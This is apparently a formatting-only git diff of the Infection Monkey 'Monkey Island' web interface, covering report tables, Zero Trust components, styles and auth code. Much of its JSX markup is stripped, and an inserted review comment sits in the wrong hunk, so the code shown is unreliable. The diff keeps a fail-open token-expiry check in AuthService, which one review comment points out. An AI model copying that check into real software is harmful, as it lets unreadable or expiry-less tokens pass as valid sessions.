@@ -29,7 +29,7 @@ class TelemetryPageComponent extends AuthComponent { .then(res => this.setState({data: res.objects})); }; -downloadIslandLog = () => { + downloadIslandLog = () => { this.authFetch('/api/log/island/download') .then(res => res.json()) .then(res => { @@ -37,39 +37,39 @@ downloadIslandLog = () => { let logContent = (res['log_file']); download(logContent, filename, 'text/plain'); }); - }; + }; render() { return ( -
    - -

    Log

    -
    - -
    - -
    -
    - -

    Monkey Island Logs

    -
    -

    Download Monkey Island internal log file

    - -
    - + Download +
    + +
    -
    ); } } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js b/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js index 5bc6183fd..c5300f657 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/common/PaginatedTable.js @@ -18,8 +18,7 @@ class PaginatedTable extends Component { />
    ); - } - else { + } else { return (
    ); diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js index 13f9cd92e..92dac6cff 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/AttackReport.js @@ -100,9 +100,9 @@ class AttackReportPageComponent extends AuthComponent { } onToggle = technique => - this.setState(state => ({ collapseOpen: state.collapseOpen === technique ? null : technique })); + this.setState(state => ({collapseOpen: state.collapseOpen === technique ? null : technique})); - getComponentClass(tech_id){ + getComponentClass(tech_id) { switch (this.state.report[tech_id].status) { case ScanStatus.SCANNED: return 'collapse-info'; @@ -113,9 +113,9 @@ class AttackReportPageComponent extends AuthComponent { } } - getTechniqueCollapse(tech_id){ + getTechniqueCollapse(tech_id) { return ( -
    +
    @@ -146,23 +146,23 @@ class AttackReportPageComponent extends AuthComponent { } renderLegend() { - return( ) + return () } - generateReportContent(){ + generateReportContent() { let content = []; Object.keys(this.state.report).forEach((tech_id) => { content.push(this.getTechniqueCollapse(tech_id)) @@ -177,15 +177,14 @@ class AttackReportPageComponent extends AuthComponent { render() { let content; - if (! this.state.runStarted) - { + if (!this.state.runStarted) { content =

    You have to run a monkey before generating a report!

    ; - } else if (this.state.report === false){ - content = (

    Generating Report...

    ); + } else if (this.state.report === false) { + content = (

    Generating Report...

    ); } else if (Object.keys(this.state.report).length === 0) { if (this.state.runStarted) { content = (

    No techniques were scanned

    ); @@ -193,7 +192,7 @@ class AttackReportPageComponent extends AuthComponent { } else { content = this.generateReportContent(); } - return (
    {content}
    ); + return (
    {content}
    ); } } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js index 16f445ce9..b1dc64f62 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/BreachedServers.js @@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { return
    {val.map(x =>
    {x}
    )}
    ; }; @@ -14,10 +14,12 @@ const columns = [ Header: 'Breached Servers', columns: [ {Header: 'Machine', accessor: 'label'}, - {Header: 'IP Addresses', id: 'ip_addresses', - accessor: x => renderIpAddresses(x)}, + { + Header: 'IP Addresses', id: 'ip_addresses', + accessor: x => renderIpAddresses(x) + }, {Header: 'Exploits', id: 'exploits', accessor: x => renderArray(x.exploits)} - ] + ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js index ea39e3c45..ebbc473f8 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/PostBreach.js @@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { return {val.map(x => {x})}; }; @@ -15,36 +15,36 @@ let renderMachine = function (data) { let renderPbaResults = function (results) { let pbaClass = ""; - if (results[1]){ - pbaClass="pba-success" + if (results[1]) { + pbaClass = "pba-success" } else { - pbaClass="pba-danger" + pbaClass = "pba-danger" } return
    {results[0]}
    }; const subColumns = [ - {id: 'pba_name', Header: "Name", accessor: x => x.name, style: { 'whiteSpace': 'unset' }, width: 160}, - {id: 'pba_output', Header: "Output", accessor: x => renderPbaResults(x.result), style: { 'whiteSpace': 'unset' }} + {id: 'pba_name', Header: "Name", accessor: x => x.name, style: {'whiteSpace': 'unset'}, width: 160}, + {id: 'pba_output', Header: "Output", accessor: x => renderPbaResults(x.result), style: {'whiteSpace': 'unset'}} ]; let renderDetails = function (data) { let defaultPageSize = data.length > pageSize ? pageSize : data.length; let showPagination = data.length > pageSize; return + data={data} + columns={subColumns} + defaultPageSize={defaultPageSize} + showPagination={showPagination} + style={{"backgroundColor": "#ededed"}} + /> }; const columns = [ { Header: 'Post breach actions', columns: [ - {id: 'pba_machine', Header:'Machine', accessor: x => renderMachine(x)} + {id: 'pba_machine', Header: 'Machine', accessor: x => renderMachine(x)} ] } ]; @@ -57,8 +57,8 @@ class PostBreachComponent extends React.Component { } render() { - let pbaMachines = this.props.data.filter(function(value, index, arr){ - return ( value.pba_results !== "None" && value.pba_results.length > 0); + let pbaMachines = this.props.data.filter(function (value, index, arr) { + return (value.pba_results !== "None" && value.pba_results.length > 0); }); let defaultPageSize = pbaMachines.length > pageSize ? pageSize : pbaMachines.length; let showPagination = pbaMachines > pageSize; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js index 57418e415..585e6af37 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/ScannedServers.js 
@@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { return
    {val.map(x =>
    {x}
    )}
    ; }; @@ -13,11 +13,13 @@ const columns = [ { Header: 'Scanned Servers', columns: [ - { Header: 'Machine', accessor: 'label'}, - { Header: 'IP Addresses', id: 'ip_addresses', - accessor: x => renderIpAddresses(x)}, - { Header: 'Accessible From', id: 'accessible_from_nodes', accessor: x => renderArray(x.accessible_from_nodes)}, - { Header: 'Services', id: 'services', accessor: x => renderArray(x.services)} + {Header: 'Machine', accessor: 'label'}, + { + Header: 'IP Addresses', id: 'ip_addresses', + accessor: x => renderIpAddresses(x) + }, + {Header: 'Accessible From', id: 'accessible_from_nodes', accessor: x => renderArray(x.accessible_from_nodes)}, + {Header: 'Services', id: 'services', accessor: x => renderArray(x.services)} ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js index fde46f85a..25a701871 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/StolenPasswords.js @@ -5,9 +5,9 @@ const columns = [ { Header: 'Stolen Credentials', columns: [ - { Header: 'Username', accessor: 'username'}, - { Header: 'Type', accessor: 'type'}, - { Header: 'Stolen From', accessor: 'origin'} + {Header: 'Username', accessor: 'username'}, + {Header: 'Type', accessor: 'type'}, + {Header: 'Stolen From', accessor: 'origin'} ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js index a8f045479..2c2a79c07 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/StrongUsers.js 
@@ -1,7 +1,7 @@ import React from 'react'; import ReactTable from 'react-table' -let renderArray = function(val) { +let renderArray = function (val) { console.log(val); return
    {val.map(x =>
    {x}
    )}
    ; }; @@ -10,9 +10,9 @@ const columns = [ { Header: 'Powerful Users', columns: [ - { Header: 'Username', accessor: 'username'}, - { Header: 'Machines', id: 'machines', accessor: x => renderArray(x.machines)}, - { Header: 'Services', id: 'services', accessor: x => renderArray(x.services_names)} + {Header: 'Username', accessor: 'username'}, + {Header: 'Machines', id: 'machines', accessor: x => renderArray(x.machines)}, + {Header: 'Services', id: 'services', accessor: x => renderArray(x.services_names)} ] } ]; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js index 761ff94a9..49905531c 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsButton.js @@ -21,13 +21,13 @@ export default class EventsButton extends Component { render() { return - -
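Review bot: `console.log(val);` inside `renderArray` is carried over as a context line of the reformatted hunk; it writes every machine list and service-name list of the "Powerful Users" table to the browser console on each render. That reads as leftover debugging rather than intended behaviour, so removing the line while this function is being touched is worthwhile, leaving `let renderArray = function (val) {` followed directly by the `return`. The sibling `renderArray` definitions reformatted in BreachedServers.js and ScannedServers.js in this same patch have no such call, which supports dropping it here too.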
    - -
    + +
    + +
    ; } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js index a7f2fe41c..2f56c7a76 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsModal.js @@ -20,9 +20,11 @@ export default class EventsModal extends Component {

    Events

    -
    +

    - There {Pluralize('is', this.props.events.length)} {

    {this.props.events.length}
    } {Pluralize('event', this.props.events.length)} associated with this finding. + There {Pluralize('is', this.props.events.length)} {
    {this.props.events.length}
    } {Pluralize('event', this.props.events.length)} associated + with this finding.

    {this.props.events.length > 5 ? this.renderButtons() : null} diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js index b7fb90811..e124b6659 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/EventsTimeline.js @@ -22,8 +22,8 @@ export default class EventsTimeline extends Component { key={index} createdAt={event_time} title={event.title} - icon={icon}> - {event.message} + icon={icon}> + {event.message} ) }) } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js index 51c5ca380..2eb839504 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PillarLabel.js @@ -15,7 +15,8 @@ const pillarToIcon = { export default class PillarLabel extends Component { render() { const className = "label " + statusToLabelType[this.props.status]; - return
    {this.props.pillar}
    + return
    {this.props.pillar}
    } } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js index b50ee0c28..6db2dfad3 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/PrinciplesStatusTable.js @@ -10,19 +10,22 @@ const MAX_WIDTH_STATUS_COLUMN = 80; const columns = [ { columns: [ - { Header: 'Status', id: 'status', + { + Header: 'Status', id: 'status', accessor: x => { - return ; + return ; }, maxWidth: MAX_WIDTH_STATUS_COLUMN }, - { Header: 'Zero Trust Principle', accessor: 'principle', + { + Header: 'Zero Trust Principle', accessor: 'principle', style: {'whiteSpace': 'unset'} // This enables word wrap }, - { Header: 'Monkey Tests', id: 'tests', + { + Header: 'Monkey Tests', id: 'tests', style: {'whiteSpace': 'unset'}, // This enables word wrap accessor: x => { - return ; + return ; } } ] diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js index 5ef75f2b4..0820fe3a6 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/ReportLegend.js @@ -13,7 +13,7 @@ class ZeroTrustReportLegend extends Component { -

    Legend

    +

    Legend

    @@ -32,7 +32,8 @@ class ZeroTrustReportLegend extends Component {
    - {"\t"}At least one of the tests related to this component failed. This means that the Infection Monkey detected an unmet Zero Trust requirement. + {"\t"}At least one of the tests related to this component failed. This means that the Infection Monkey detected an + unmet Zero Trust requirement.
  • @@ -50,7 +51,8 @@ class ZeroTrustReportLegend extends Component {
    - {"\t"}This status means the test wasn't executed.To activate more tests, refer to the Monkey configuration page. + {"\t"}This status means the test wasn't executed.To activate more tests, refer to the Monkey configuration page.
  • ; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js index 8e4512ac7..8de7a4d21 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SinglePillarPrinciplesStatus.js @@ -9,14 +9,14 @@ export default class SinglePillarPrinciplesStatus extends AuthComponent { render() { if (this.props.principlesStatus.length === 0) { return null; - } - else { + } else { return (

    - +

    diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js index d34a484b9..0002ba9e0 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/StatusesToPillarsSummary.js @@ -21,11 +21,11 @@ export default class StatusesToPillarsSummary extends Component {
    - { - this.props.statusesToPillars[status].map((pillar) => { - return - }) - } + { + this.props.statusesToPillars[status].map((pillar) => { + return + }) + }
    } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js index e4012bf50..0f937f341 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js @@ -14,9 +14,10 @@ export default class SummarySection extends Component {

    - Get a quick glance at how your network aligns with the - Zero Trust eXtended (ZTX) framework - . + Get a quick glance at how your network aligns with the + Zero Trust eXtended (ZTX) framework + .

    diff --git a/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js b/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js index 6a8fe9416..f2815a142 100644 --- a/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js +++ b/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js @@ -8,10 +8,10 @@ const columns = [ { Header: 'Machines', columns: [ - { Header: 'Machine', accessor: 'name'}, - { Header: 'Instance ID', accessor: 'instance_id'}, - { Header: 'IP Address', accessor: 'ip_address'}, - { Header: 'OS', accessor: 'os'} + {Header: 'Machine', accessor: 'name'}, + {Header: 'Instance ID', accessor: 'instance_id'}, + {Header: 'IP Address', accessor: 'ip_address'}, + {Header: 'OS', accessor: 'os'} ] } ]; @@ -44,7 +44,7 @@ class AwsRunTableComponent extends React.Component { selection.push(key); } // update the state - this.setState({ selection }); + this.setState({selection}); }; isSelected = key => { @@ -64,7 +64,7 @@ class AwsRunTableComponent extends React.Component { selection.push(item._original.instance_id); }); } - this.setState({ selectAll, selection }); + this.setState({selectAll, selection}); }; getTrProps = (s, r) => { diff --git a/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js b/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js index 74204973a..f200a6fdb 100644 --- a/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js +++ b/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js 
@@ -15,59 +15,68 @@ class CheckboxComponent extends React.PureComponent { this.props.name (the name of this component) and this.state.checked (boolean indicating if this component is checked or not) */ - constructor(props) { - super(props); - this.state = { - checked: this.props.checked, + constructor(props) { + super(props); + this.state = { + checked: this.props.checked, necessary: this.props.necessary, - isAnimating: false - }; - this.toggleChecked = this.toggleChecked.bind(this); - this.stopAnimation = this.stopAnimation.bind(this); - this.composeStateClasses = this.composeStateClasses.bind(this); - } + isAnimating: false + }; + this.toggleChecked = this.toggleChecked.bind(this); + this.stopAnimation = this.stopAnimation.bind(this); + this.composeStateClasses = this.composeStateClasses.bind(this); + } - //Toggles component. - toggleChecked() { - if (this.state.isAnimating) {return false;} - this.setState({ - checked: !this.state.checked, - isAnimating: true, - }, () => { this.props.changeHandler ? this.props.changeHandler(this.props.name, this.state.checked) : null}); - } + //Toggles component. + toggleChecked() { + if (this.state.isAnimating) { + return false; + } + this.setState({ + checked: !this.state.checked, + isAnimating: true, + }, () => { + this.props.changeHandler ? 
this.props.changeHandler(this.props.name, this.state.checked) : null + }); + } - // Stops ping animation on checkbox after click - stopAnimation() { - this.setState({ isAnimating: false }) - } + // Stops ping animation on checkbox after click + stopAnimation() { + this.setState({isAnimating: false}) + } - // Creates class string for component - composeStateClasses(core) { - let result = core; - if (this.state.necessary){ + // Creates class string for component + composeStateClasses(core) { + let result = core; + if (this.state.necessary) { return result + ' blocked' } - if (this.state.checked) { result += ' is-checked'; } - else { result += ' is-unchecked' } + if (this.state.checked) { + result += ' is-checked'; + } else { + result += ' is-unchecked' + } - if (this.state.isAnimating) { result += ' do-ping'; } - return result; - } + if (this.state.isAnimating) { + result += ' do-ping'; + } + return result; + } - render() { - const cl = this.composeStateClasses('ui-checkbox-btn'); - return ( -
    - - -
    -
    - ) - } + render() { + const cl = this.composeStateClasses('ui-checkbox-btn'); + return ( +
    + + +
    +
    + ) + } } export default CheckboxComponent; diff --git a/monkey/monkey_island/cc/ui/src/config/base.js b/monkey/monkey_island/cc/ui/src/config/base.js index 65b6aff99..bea121a3c 100644 --- a/monkey/monkey_island/cc/ui/src/config/base.js +++ b/monkey/monkey_island/cc/ui/src/config/base.js @@ -1,5 +1,4 @@ 'use strict'; // Settings configured here will be merged into the final config object. -export default { -} +export default {} diff --git a/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg b/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg index 3a357890d..ee2d9cda0 100644 --- a/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg +++ b/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg @@ -2,30 +2,45 @@ 14cbedff-3eed-4f8f-abb7-fffe92867ded - - - - - - + + + + + + - - - - - - - - + + + + + + + + - + diff --git a/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg b/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg index 837610f28..5e91edec1 100644 --- a/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg +++ b/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg @@ -2,7 +2,7 @@ @@ -10,8 +10,11 @@ - - - + + + diff --git a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg index 507541be4..341223590 100644 --- a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg +++ b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg @@ -1 +1,13 @@ -im-alert-machine-icon \ No newline at end of file + + im-alert-machine-icon + + + + + + + + + + diff --git a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg index 50dcc6726..0951d7ae2 100644 --- a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg +++ b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg 
@@ -1 +1,23 @@ -im-alert-network-icon \ No newline at end of file + + im-alert-network-icon + + + + + + + + + + + + + + + + + + + + + diff --git a/monkey/monkey_island/cc/ui/src/index.html b/monkey/monkey_island/cc/ui/src/index.html index 3e7028fc1..38b0c114d 100644 --- a/monkey/monkey_island/cc/ui/src/index.html +++ b/monkey/monkey_island/cc/ui/src/index.html @@ -8,6 +8,6 @@ -
    +
    diff --git a/monkey/monkey_island/cc/ui/src/index.js b/monkey/monkey_island/cc/ui/src/index.js index 329e94dfe..b2c79eaf9 100644 --- a/monkey/monkey_island/cc/ui/src/index.js +++ b/monkey/monkey_island/cc/ui/src/index.js @@ -6,4 +6,4 @@ import App from './components/Main'; import Bootstrap from 'bootstrap/dist/css/bootstrap.css'; // eslint-disable-line no-unused-vars // Render the main component into the dom -ReactDOM.render(, document.getElementById('app')); +ReactDOM.render(, document.getElementById('app')); diff --git a/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js b/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js index 1c5814b5a..452bfaede 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js @@ -1,6 +1,6 @@ import BaseConfig from './BaseConfig'; -class AwsConfig extends BaseConfig{ +class AwsConfig extends BaseConfig { isAuthEnabled() { return true; } diff --git a/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js b/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js index 359b21bfb..167d1ab60 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js @@ -1,6 +1,6 @@ import BaseConfig from './BaseConfig'; -class PasswordConfig extends BaseConfig{ +class PasswordConfig extends BaseConfig { isAuthEnabled() { return true; } diff --git a/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js b/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js index f549f7112..c3ace9a97 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js @@ -2,7 +2,7 @@ import BaseConfig from './BaseConfig'; class StandardConfig extends BaseConfig { - isAuthEnabled () { + isAuthEnabled() { return false; } } 
diff --git a/monkey/monkey_island/cc/ui/src/services/AuthService.js b/monkey/monkey_island/cc/ui/src/services/AuthService.js index 9c62bde63..3fb70c5bb 100644 --- a/monkey/monkey_island/cc/ui/src/services/AuthService.js +++ b/monkey/monkey_island/cc/ui/src/services/AuthService.js @@ -1,4 +1,4 @@ -import { SHA3 } from 'sha3'; +import {SHA3} from 'sha3'; import decode from 'jwt-decode'; export default class AuthService { @@ -97,8 +97,7 @@ export default class AuthService { _isTokenExpired(token) { try { return decode(token)['exp'] < Date.now() / 1000; - } - catch (err) { + } catch (err) { return false; } } diff --git a/monkey/monkey_island/cc/ui/src/styles/App.css b/monkey/monkey_island/cc/ui/src/styles/App.css index 109f1c147..12a430cf9 100644 --- a/monkey/monkey_island/cc/ui/src/styles/App.css +++ b/monkey/monkey_island/cc/ui/src/styles/App.css @@ -74,14 +74,17 @@ body { background: #e9e9e9; text-decoration: none; } + li a.active { background: #333333; text-decoration: none; color: #ffcc00; } + li a.active:hover { color: #ffcc00; } + li a.disabled { color: #666; cursor: auto; @@ -190,6 +193,7 @@ body { .nav > li > a:focus { background-color: transparent !important; } + /* * Run Monkey Page */ @@ -226,13 +230,16 @@ body { font-size: 20px; } + .preview-pane h3 small { margin-top: 0.5em; display: block; } + .preview-pane h3 .fa { margin-right: 5px; } + .preview-pane h4 { text-transform: uppercase; color: #999; @@ -240,7 +247,7 @@ body { margin-top: 0; } -.preview-pane .table tr:first-child th , .preview-pane .table tr:first-child td { +.preview-pane .table tr:first-child th, .preview-pane .table tr:first-child td { border-top: 0; } @@ -299,7 +306,7 @@ body { left: 0; right: 0; height: 130px; - background: rgba(0,0,0,0.7); + background: rgba(0, 0, 0, 0.7); border-radius: 5px; border: 3px solid #aaa; padding: 0.5em; 
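Review bot: The reformatted `catch (err)` in `_isTokenExpired` still returns `false`, so a token that `decode` cannot parse is reported as *not* expired — the failure mode treats an unreadable token as valid, which is the wrong default for an expiry check; a token with no `exp` claim behaves the same way, since `undefined < n` is `false`. Prefer failing closed: `} catch (err) { return true; }` and, in the `try`, `const exp = decode(token)['exp']; return typeof exp !== 'number' || exp < Date.now() / 1000;`. How callers use this result is outside the hunk, so whether it affects anything beyond client-side session state cannot be told from here.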
@@ -329,7 +336,7 @@ body { padding: 0; } -.data-table-container > .container th , .data-table-container > .container td { +.data-table-container > .container th, .data-table-container > .container td { padding: 15px 8px; } @@ -341,7 +348,7 @@ body { margin-left: 1em; } -#search-field , #page-menu { +#search-field, #page-menu { margin-left: 0.5em; margin-bottom: 1em; height: 34px; @@ -477,21 +484,21 @@ body { } .alert-danger { - color:#a94442 !important; - background-color:#f2dede !important; - border-color:#ebccd1 !important; + color: #a94442 !important; + background-color: #f2dede !important; + border-color: #ebccd1 !important; } .alert-success { - color:#3c763d !important; - background-color:#dff0d8 !important; - border-color:#d6e9c6 !important; + color: #3c763d !important; + background-color: #dff0d8 !important; + border-color: #d6e9c6 !important; } .alert-info { - color:#31708f !important; - background-color:#d9edf7 !important; - border-color:#bce8f1 !important; + color: #31708f !important; + background-color: #d9edf7 !important; + border-color: #bce8f1 !important; } .label-default { @@ -529,7 +536,7 @@ body { margin-bottom: 20px; } -.attack-report .btn-collapse span:nth-of-type(2){ +.attack-report .btn-collapse span:nth-of-type(2) { flex: 0; } @@ -580,7 +587,7 @@ body { margin-right: auto; } -.attack-report.footer-text{ +.attack-report.footer-text { text-align: right; font-size: 0.8em; margin-top: 20px; diff --git a/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss b/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss index 3bf0281f6..b18908c5e 100644 --- a/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss +++ b/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss 
@@ -6,100 +6,105 @@ $green: #44CF6C; $black: #000000; .ui-checkbox-btn { - position: relative; - display: inline-block; - background-color: rgba(red, .6); + position: relative; + display: inline-block; + background-color: rgba(red, .6); text-align: center; width: 100%; height: 100%; - input { display: none; } + input { + display: none; + } - .icon, - .text { - display: inline-block; - color: inherit; - } + .icon, + .text { + display: inline-block; + color: inherit; + } - .text { + .text { padding-top: 4px; - font-size: 14px; - } + font-size: 14px; + } - // color states - &.is-unchecked { - background-color: transparent; - color: $black; - fill: $black; - } + // color states + &.is-unchecked { + background-color: transparent; + color: $black; + fill: $black; + } &.blocked { background-color: $dark-green; - color: $light-grey; - fill: $light-grey; + color: $light-grey; + fill: $light-grey; } - &.is-checked { - background-color: $green; - color: white; - fill: white; - } + &.is-checked { + background-color: $green; + color: white; + fill: white; + } } .icon { - position: relative; - display: inline-block; + position: relative; + display: inline-block; - svg { - position: absolute; - top: 0; right: 0; bottom: 0; left: 0; - margin: auto; - width: 16px; - height: auto; - fill: inherit; - } + svg { + position: absolute; + top: 0; + right: 0; + bottom: 0; + left: 0; + margin: auto; + width: 16px; + height: auto; + fill: inherit; + } - .is-checked & { - color: white; - fill: white; - } + .is-checked & { + color: white; + fill: white; + } } // ping animation magic .ui-btn-ping { - position: absolute; - top: 50%; - left: 50%; - width: 100%; - transform: translate3d(-50%, -50%, 0); // center center by default + position: absolute; + top: 50%; + left: 50%; + width: 100%; + transform: translate3d(-50%, -50%, 0); // center center by default - // set the square - &:before { - content: ''; - transform: scale(0, 0); // center center by default - transition-property: background-color 
transform; - transition-timing-function: cubic-bezier(0.0, 0.0, 0.2, 1); - display: block; - padding-bottom: 100%; - border-radius: 50%; - background-color: rgba(white, .84);; - } + // set the square + &:before { + content: ''; + transform: scale(0, 0); // center center by default + transition-property: background-color transform; + transition-timing-function: cubic-bezier(0.0, 0.0, 0.2, 1); + display: block; + padding-bottom: 100%; + border-radius: 50%; + background-color: rgba(white, .84);; + } - .do-ping &:before { - transform: scale(2.5, 2.5); - transition-duration: .35s; - background-color: rgba(white, .08); - } + .do-ping &:before { + transform: scale(2.5, 2.5); + transition-duration: .35s; + background-color: rgba(white, .08); + } } -.icon-checked{ - color:$green +.icon-checked { + color: $green } -.icon-mandatory{ - color:$dark-green +.icon-mandatory { + color: $dark-green } -.icon-unchecked{ - color:$black; +.icon-unchecked { + color: $black; } diff --git a/monkey/monkey_island/cc/ui/src/styles/Collapse.scss b/monkey/monkey_island/cc/ui/src/styles/Collapse.scss index e2d7d334a..9277400b8 100644 --- a/monkey/monkey_island/cc/ui/src/styles/Collapse.scss +++ b/monkey/monkey_island/cc/ui/src/styles/Collapse.scss @@ -14,8 +14,8 @@ $default-color: #e0ddde; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } -.collapse-item button span:first-child{ - text-align:left; +.collapse-item button span:first-child { + text-align: left; } .collapse-item button { @@ -25,7 +25,8 @@ $default-color: #e0ddde; transition: background-color $transition; display: flex; font-family: inherit; - > span { + + > span { display: inline-block; flex: 4; text-align: right; @@ -50,6 +51,7 @@ $default-color: #e0ddde; .collapse-item { padding: 0.5rem; + &--active { .btn-collapse { background-color: #f7f7f7; 
